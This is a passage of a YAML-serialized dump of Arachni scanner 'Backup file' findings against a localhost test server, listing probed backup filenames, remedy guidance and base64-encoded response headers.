move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.BAK
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.BAK
injected: some_filename.BAK
id: some_filename.BAK
elem: path
remarks: {}
method: ''
response: some_filename.BAK
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.old
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.old
injected: some_filename.php.old
id: some_filename.php.old
elem: path
remarks: {}
method: ''
response: some_filename.php.old
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.orig
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.orig
injected: some_filename.php.orig
id: some_filename.php.orig
elem: path
remarks: {}
method: ''
response: some_filename.php.orig
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.orig
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.orig
injected: some_filename.orig
id: some_filename.orig
elem: path
remarks: {}
method: ''
response: some_filename.orig
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.backup
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.backup
injected: some_filename.php.backup
id: some_filename.php.backup
elem: path
remarks: {}
method: ''
response: some_filename.php.backup
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.backup
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.backup
injected: some_filename.backup
id: some_filename.backup
elem: path
remarks: {}
method: ''
response: some_filename.backup
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.000
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.000
injected: some_filename.php.000
id: some_filename.php.000
elem: path
remarks: {}
method: ''
response: some_filename.php.000
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.ZIP
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.ZIP
injected: some_filename.ZIP
id: some_filename.ZIP
elem: path
remarks: {}
method: ''
response: some_filename.ZIP
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.ZIP
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.ZIP
injected: some_filename.php.ZIP
id: some_filename.php.ZIP
elem: path
remarks: {}
method: ''
response: some_filename.php.ZIP
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.gz
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.gz
injected: some_filename.php.gz
id: some_filename.php.gz
elem: path
remarks: {}
method: ''
response: some_filename.php.gz
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.gz
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.gz
injected: some_filename.gz
id: some_filename.gz
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: some_filename.gz
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.tar.gz
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.tar.gz
injected: some_filename.php.tar.gz
id: some_filename.php.tar.gz
elem: path
remarks: {}
method: ''
response: some_filename.php.tar.gz
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
